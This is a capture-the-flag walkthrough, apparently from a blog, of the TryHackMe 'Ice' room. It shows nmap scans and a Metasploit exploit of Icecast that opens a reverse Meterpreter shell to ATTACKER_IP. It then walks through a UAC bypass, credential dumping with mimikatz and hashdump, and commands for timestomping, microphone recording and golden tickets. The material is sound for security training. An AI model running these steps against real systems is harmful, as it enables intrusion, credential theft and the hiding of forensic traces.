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2 Setup

We first need to connect to the tryhackme VPN server. You can get more information regarding this by visiting the Access page.

I'll be using openupn to connect to the server. Here's the command:

```
$ sudo openvpn --config NovusEdge.ovpn
```

PS: the room on THM has a very nice and detailed description for this setup phase :)

Enumeration

Starting off with some standard NMAP scans:

```
$ sudo nmap -sS --top-ports 1000 -vv MACHINE_IP
Scanning MACHINE_IP [1000 ports]
Discovered open port 3389/tcp on MACHINE_IP
Discovered open port 139/tcp on MACHINE_IP
Discovered open port 445/tcp on MACHINE_IP
Discovered open port 135/tcp on MACHINE_IP
Discovered open port 8000/tcp on MACHINE_IP
Discovered open port 49153/tcp on MACHINE_IP
Discovered open port 49158/tcp on MACHINE_IP
Discovered open port 5357/tcp on MACHINE_IP
Discovered open port 49154/tcp on MACHINE_IP
Discovered open port 49152/tcp on MACHINE_IP
Discovered open port 49160/tcp on MACHINE_IP
Discovered open port 49159/tcp on MACHINE_IP
PORT
          STATE SERVICE
                              REASON
135/tcp
                              syn-ack ttl 127
          open msrpc
```

```
139/tcp
                            syn-ack ttl 127
         open netbios-ssn
               microsoft-ds syn-ack ttl 127
445/tcp
         open
3389/tcp open ms-wbt-server syn-ack ttl 127
5357/tcp open
               wsdapi
                             syn-ack ttl 127
8000/tcp open http-alt
                             syn-ack ttl 127
49152/tcp open
               unknown
                             syn-ack ttl 127
49153/tcp open unknown
                             syn-ack ttl 127
49154/tcp open unknown
                             syn-ack ttl 127
49158/tcp open unknown
                             syn-ack ttl 127
49159/tcp open unknown
                             syn-ack ttl 127
49160/tcp open unknown
                             syn-ack ttl 127
```

NOTE: Even though the task description says to scan all ports, it's far quicker to scan top ports.

```
$ sudo nmap -sV -vv -p3389,139,445,135,8000,49153,49158,5357,49154,49152,49160,49159 MACHINE_IP
PORT
         STATE SERVICE
                              REASON
                                              VERSION
                              syn-ack ttl 127 Microsoft Windows RPC
135/tcp
         open
                msrpc
139/tcp
                netbios-ssn syn-ack ttl 127 Microsoft Windows netbios-ssn
         open
                microsoft-ds syn-ack ttl 127 Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
445/tcp
         open
3389/tcp open
                ms-wbt-server syn-ack ttl 127
5357/tcp open
                              syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
                http
                              syn-ack ttl 127 Icecast streaming media server
8000/tcp open
                http
49152/tcp open
                              syn-ack ttl 127 Microsoft Windows RPC
                msrpc
                              syn-ack ttl 127 Microsoft Windows RPC
49153/tcp open
49154/tcp open
                              syn-ack ttl 127 Microsoft Windows RPC
49158/tcp open
                              syn-ack ttl 127 Microsoft Windows RPC
                msrpc
49159/tcp open
                              syn-ack ttl 127 Microsoft Windows RPC
                              syn-ack ttl 127 Microsoft Windows RPC
49160/tcp open
                msrpc
Service Info: Host: DARK-PC; OS: Windows; CPE: cpe:/o:microsoft:windows
```

Looking through the results of these scans, we can guess that the "more interesting ports that is open is Microsoft Remote Desktop (MSRDP)" is, in fact, port 3389

Once the scan completes, we'll see a number of interesting ports open on this machine. As you might have guessed, the firewall has been disabled (with the service completely shutdown), leaving very little to protect this machine. One of the more interesting ports that is open is Microsoft Remote Desktop (MSRDP). What port is this open on?

> 3389

Yet another question answered:

What service did nmap identify as running on port 8000? (First word of this service) > Icecast

We also get the answer of the final question:

What does Nmap identify as the hostname of the machine? (All caps for the answer)

> DARK-PC

Gain Access

With some digging around on the website mentioned in the section's first question (https://www.cvedetails.com/), we quickly find the vulnerability: CVE-2004-1561 . To answer the first question:

What type of vulnerability is it?

> Execute Code Overflow

Furthermore, the answering the second question:

What is the CVE number for this vulnerability? This will be in the format: CVE-0000-0000

> CVE-2004-1561

As directed, we'll fire up metasploit and search for an exploit:

```
Name
           Current Setting Required Description
  RHOSTS
                                      The target host(s), see https://github.com/rapid7/metasploit-
                           yes
                                      framework/wiki/Using-Metasploit
                                      The target port (TCP)
  RPORT
                            yes
Payload options (windows/meterpreter/reverse_tcp):
   Name
             Current Setting Required Description
  EXITFUNC thread
                                        Exit technique (Accepted: '', seh, thread, process, none)
                              yes
  LHOST
            10.80.0.22
                                        The listen address (an interface may be specified)
                              yes
            4444
  LPORT
                                        The listen port
                              yes
Exploit target:
   Id Name
       Automatic
```

The answer for the 3rd question:

What is the full path (starting with exploit) for the exploitation module?

> exploit/windows/http/icecast_header

```
msf6 exploit(windows/http/icecast_header) > set RHOSTS MACHINE_IP
RHOSTS => MACHINE_IP

msf6 exploit(windows/http/icecast_header) > set LHOST ATTACKER_IP
LHOST => ATTACKER_IP

msf6 exploit(windows/http/icecast_header) > run

[*] Started reverse TCP handler on ATTACKER_IP:4444

[*] Sending stage (175686 bytes) to MACHINE_IP

[*] Meterpreter session 1 opened (ATTACKER_IP:4444 -> MACHINE_IP:49223) at 2022-10-26 20:07:42 +0330
```

Done! Now we can move onto privilage escalation.

Privilage Escalation

Since we now have a meterpreter session going, the term's also the answer for the first question in this section:

What's the name of the shell we have now?

> meterpreter

We can get the answer to the next question like so:

```
meterpreter > getuid

Server username: Dark-PC\Dark
```

What user was running that Icecast process?

> Dark

To get some information on the system, we can execute sysinfo:

```
meterpreter > sysinfo
```

Computer : DARK-PC

OS : Windows 7 (6.1 Build 7601, Service Pack 1).

Architecture : x64

System Language : en_US

Domain : WORKGROUP

Logged On Users : 2

Meterpreter : x86/windows

We thus have the answer to the third and foutth questions:

What build of Windows is the system?

> 7601

What is the architecture of the process we're running?

> x64

Executing: run post/multi/recon/local_exploit_suggester will, as the name suggests, give us names of some potential exploits that we can make use of.

```
meterpreter > run post/multi/recon/local_exploit_suggester

[*] MACHINE_IP - Collecting local exploits for x86/windows...

[*] MACHINE_IP - 170 exploit checks are being tried...

[+] MACHINE_IP - exploit/windows/local/bypassuac_eventvwr: The target appears to be vulnerable.

[+] MACHINE_IP - exploit/windows/local/ms10_092_schelevator: The service is running, but could not be

validated.

[+] MACHINE_IP - exploit/windows/local/ms13_053_schlamperei: The target appears to be vulnerable.

[+] MACHINE_IP - exploit/windows/local/ms13_081_track_popup_menu: The target appears to be vulnerable.

[+] MACHINE_IP - exploit/windows/local/ms14_058_track_popup_menu: The target appears to be vulnerable.
```

```
[+] MACHINE_IP - exploit/windows/local/ntusermndragover: The target appears to be vulnerable.
[+] MACHINE_IP - exploit/windows/local/ppr_flatten_rec: The target appears to be vulnerable.
[+] MACHINE_IP - exploit/windows/local/tokenmagic: The target appears to be vulnerable.
[*] Running check method for exploit 41 / 41
[*] MACHINE_IP - Valid modules for session 1:
_____
                                                                    Potentially Vulnerable? Check Result
#
    Name
    exploit/windows/local/bypassuac_eventvwr
                                                                    Yes
                                                                                             The target
   appears to be vulnerable.
    exploit/windows/local/ms10_092_schelevator
                                                                                             The service is
                                                                    Yes
   running, but could not be validated.
    exploit/windows/local/ms13_053_schlamperei
                                                                    Yes
                                                                                             The target
   appears to be vulnerable.
    exploit/windows/local/ms13_081_track_popup_menu
                                                                                             The target
                                                                    Yes
   appears to be vulnerable.
    exploit/windows/local/ms14_058_track_popup_menu
                                                                    Yes
                                                                                             The target
   appears to be vulnerable.
    exploit/windows/local/ms15_051_client_copy_image
                                                                                             The target
                                                                    Yes
   appears to be vulnerable.
    exploit/windows/local/ntusermndragover
                                                                    Yes
                                                                                             The target
   appears to be vulnerable.
    exploit/windows/local/ppr_flatten_rec
                                                                    Yes
                                                                                             The target
   appears to be vulnerable.
    exploit/windows/local/tokenmagic
9
                                                                                             The target
                                                                    Yes
   appears to be vulnerable.
```

[+] MACHINE_IP - exploit/windows/local/ms15_051_client_copy_image: The target appears to be vulnerable.

This gives the answer to the next question:

What is the full path (starting with exploit/) for the first returned exploit?

> exploit/windows/local/bypassuac_eventvwr

We can now background this session and move on to using the mentioned exploit to get escalated privilages.

```
meterpreter > background
[*] Backgrounding session 1...
```

```
msf6 exploit(windows/http/icecast_header) > use exploit/windows/local/bypassuac_eventvwr
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
```

Setting some options and running the exploit will get us an escalated session:

```
msf6 exploit(windows/local/bypassuac_eventvwr) > options
Module options (exploit/windows/local/bypassuac_eventvwr):
  Name
           Current Setting Required Description
  SESSION
                                      The session to run this module on
                            yes
Payload options (windows/meterpreter/reverse_tcp):
            Current Setting Required Description
   Name
  EXITFUNC process
                                       Exit technique (Accepted: '', seh, thread, process, none)
                             yes
  LHOST
            10.80.0.22
                                       The listen address (an interface may be specified)
                             yes
  LPORT
            4444
                                       The listen port
                             yes
Exploit target:
   Id Name
      Windows x86
msf6 exploit(windows/local/bypassuac_eventvwr) > set LHOST ATTACKER_IP
LHOST => ATTACKER IP
msf6 exploit(windows/local/bypassuac_eventvwr) > sessions
Active sessions
_____
 Id Name Type
                                    Information
                                                            Connection
           meterpreter x86/windows Dark-PC\Dark @ DARK-PC ATTACKER_IP:4444 -> MACHINE_IP:4922
                                                            3 (MACHINE_IP)
```

```
msf6 exploit(windows/local/bypassuac_eventvwr) > set SESSION 1
SESSION => 1

msf6 exploit(windows/local/bypassuac_eventvwr) > run

[*] Started reverse TCP handler on ATTACKER_IP:4444

[*] UAC is Enabled, checking level...

[+] Part of Administrators group! Continuing...

[+] UAC is set to Default

[+] BypassUAC can bypass this setting, continuing...

[*] Configuring payload and stager registry keys ...

[*] Executing payload: C:\Windows\SysWOW64\eventvwr.exe

[+] eventvwr.exe executed successfully, waiting 10 seconds for the payload to execute.

[*] Sending stage (175686 bytes) to MACHINE_IP

[*] Meterpreter session 2 opened (ATTACKER_IP:4444 -> MACHINE_IP:49260) at 2022-10-26 20:41:23 +0330

[*] Cleaning up registry keys ...
```

This created a new session (session: 2) which we can now use to do whatever we need to do.

There's some questions along the way that're quite obviously answered, but here's the answers just in case:

Now that we've set our session number, further options will be revealed in the options menu. We'll have to set one more as our listener IP isn't correct. What is the name of this option?

> LHOST

```
In case you haven't yet got a meterpreter > prompt up, but have a new session available, you can bring it to foreground using sessions -i 2 or sessions 2:
```

```
msf6 exploit(windows/local/bypassuac_eventvwr) > sessions -i 2
[*] Starting interaction with 2...
```

meterpreter >

We can now view our privilages by executing getprivs :

SeIncreaseQuotaPrivilege

meterpreter > getprivs

SeIncreaseWorkingSetPrivilege

 ${\tt SeLoadDriverPrivilege}$

 ${\tt SeManageVolumePrivilege}$

SeProfileSingleProcessPrivilege

 ${\tt SeRemoteShutdownPrivilege}$

SeRestorePrivilege

SeSecurityPrivilege

SeShutdownPrivilege

SeSystemEnvironmentPrivilege

 ${\tt SeSystemProfilePrivilege}$

 ${\tt SeSystemtimePrivilege}$

SeTakeOwnershipPrivilege

SeTimeZonePrivilege

SeUndockPrivilege

Looking through this list of permissions gives us the answer to the next question:

What permission listed allows us to take ownership of files?

> SeTakeOwnershipPrivilege

H2 Looting

For those wondering, this phase usually involves looting credentials and hashes for later or current use.

	meterpreter	>	ps	
--	-------------	---	----	--

=====	:=====					
PID	PPID	Name	Arch	Session	User	Path
0	0	[System Process]				
4	0	System	x64	0		
100	692	svchost.exe	x64	0	NT AUTHORITY\SYSTEM	C:\Windows\System32\svchos
						t.exe
416	4	smss.exe	x64	0	NT AUTHORITY\SYSTEM	C:\Windows\System32\smss.e
						xe
508	692	svchost.exe	x64	0	NT AUTHORITY\SYSTEM	C:\Windows\System32\svchos
						t.exe
544	536	csrss.exe	x64	0	NT AUTHORITY\SYSTEM	C:\Windows\System32\csrss.
						exe
592	536	wininit.exe	x64	0	NT AUTHORITY\SYSTEM	C:\Windows\System32\winini
						t.exe
600	692	vds.exe	x64	0	NT AUTHORITY\SYSTEM	C:\Windows\System32\vds.ex
						е
604	584	csrss.exe	x64	1	NT AUTHORITY\SYSTEM	C:\Windows\System32\csrss.
						exe
652	584	winlogon.exe	x64	1	NT AUTHORITY\SYSTEM	C:\Windows\System32\winlog
						on.exe
692	592	services.exe	x64	0	NT AUTHORITY\SYSTEM	C:\Windows\System32\servic
						es.exe
700	592	lsass.exe	x64	0	NT AUTHORITY\SYSTEM	C:\Windows\System32\lsass.
						exe
708	592	lsm.exe	x64	0	NT AUTHORITY\SYSTEM	C:\Windows\System32\lsm.ex
						е
820	692	svchost.exe	x64	0	NT AUTHORITY\SYSTEM	C:\Windows\System32\svchos
						t.exe
1376	692	spoolsv.exe	x64	0	NT AUTHORITY\SYSTEM	C:\Windows\System32\spools
						v.exe
1572	692	amazon-ssm-agen	x64	0	NT AUTHORITY\SYSTEM	C:\Program Files\Amazon\SS
		t.exe				M\amazon-ssm-agent.exe
1588	692	TrustedInstalle	x64	0	NT AUTHORITY\SYSTEM	C:\Windows\servicing\Trust
		r.exe				edInstaller.exe

```
NT AUTHORITY\SYSTEM
1656 692
                                                                        C:\Program Files\Amazon\Xe
            LiteAgent.exe
                             x64
                                                                        ntools\LiteAgent.exe
                                            NT AUTHORITY\SYSTEM
                                                                        C:\Program Files\Amazon\Ec
1836 692
            Ec2Config.exe
                             x64
                                                                        2ConfigService\Ec2Config.e
                                            NT AUTHORITY\SYSTEM
2600
            SearchIndexer.e x64
                                                                        C:\Windows\System32\Search
                                                                         Indexer.exe
            хe
```

There's a whole bunch of processes, but we're only interested in the ones that belong to NT AUTHORITY/SYSTEM, so I took the liberty of removing all other entries of the output.

Out of all of these processes, the ones that the room suggests we utilize for looting is lsass.exe (PID 700; PPID 592) and the service spoolsv.exe (PID 1376; PPID 692). The latter being the answer to the first question in this section:

What's the name of the printer service?

> spoolsv.exe

Now, we migrate to this process, like so:

```
meterpreter > migrate -N spoolsv.exe

[*] Migrating from 2224 to 1376...

[*] Migration completed successfully.
```

Now that we've migrated, let's check our uid:

```
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
```

We thus have the answer to the second question:

Let's check what user we are now with the command <code>getuid</code> . What user is listed? > <code>NT AUTHORITY\SYSTEM</code>

Now for the actual "looting" part. We'll load mimikatz for this by executing: load mimikatz

```
'## v ##' Vincent LE TOUX (vincent.letoux@gmail.com) '####'

→ > http://pingcastle.com / http://mysmartlogon.com ***/

Success.
```

NOTE: As the command output quite clearly suggest that the extenstion's name has been changed to kiwi, it's better to use load kiwi instead of load mimikatz.

Accessing the help menu as instructed:

```
meterpreter > ?
...
...
Kiwi Commands
========

Command Description
------
creds_all Retrieve all credentials (parsed)
...
...
```

We get the answer to the next question. > Which command allows up to retrieve all credentials?

> > creds_all

And running this command gives us the answer to the question after that:

```
Password
Username Domain
(null)
         (null)
                   (null)
DARK-PC$ WORKGROUP
                   (null)
Dark
         Dark-PC
                   Password01!
tspkg credentials
==========
Username Domain
                 Password
Dark
         Dark-PC Password01!
kerberos credentials
_____
Username Domain
                   Password
(null)
         (null)
                   (null)
Dark
         Dark-PC
                   Password01!
dark-pc$ WORKGROUP (null)
```

What is Dark's password?

> Password01!

Post Exploitation

Now that the machine has been exploited, time for some post-exploitation steps like leaving backdoors and removing traces.

Using the hashdump command dumps the contents of the SAM database. It's also the answer to the first question:

What command allows us to dump all of the password hashes stored on the system?

> hashdump

```
meterpreter > hashdump

Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

Dark:1000:aad3b435b51404eeaad3b435b51404ee:7c4fe5eada682714a036e39378362bab:::

Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
```

Going through the help menu, we get answers for some more questions in this section:

What command allows us to watch the remote user's desktop in real time?

> screenshare

How about if we wanted to record from a microphone attached to the system?

> record_mic

To complicate forensics efforts we can modify timestamps of files on the system. What command allows us to do this?

> timestomp

Mimikatz allows us to create what's called a **golden ticket**, allowing us to authenticate anywhere with ease. What command allows us to do this?

> golden_ticket_create

With this last question, we can conclude this room!

Conclusion

Personally, I really had a very good time with this room. Kudos to DarkStar7471 for creating such a banger room.

I hope that this writeup helped whoever came across it:)

Link to the room: https://tryhackme.com/room/ice